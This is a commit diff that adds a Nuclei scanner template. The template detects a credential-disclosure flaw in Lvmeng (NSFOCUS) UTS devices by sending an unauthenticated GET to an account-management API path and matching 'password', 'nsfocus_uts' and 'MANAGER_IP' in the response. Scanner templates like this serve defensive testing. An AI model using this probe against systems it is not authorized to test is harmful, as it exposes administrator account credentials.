commit
4de5613573
|
@ -0,0 +1,31 @@
|
|||
id: lvmeng-uts-disclosure
|
||||
|
||||
info:
|
||||
name: Lvmeng UTS Disclosure
|
||||
author: high
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webapi/v1/system/accountmanage/account"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
condition: and
|
||||
part: header
|
||||
- type: word
|
||||
words:
|
||||
- "password"
|
||||
- "nsfocus_uts"
|
||||
- "MANAGER_IP"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue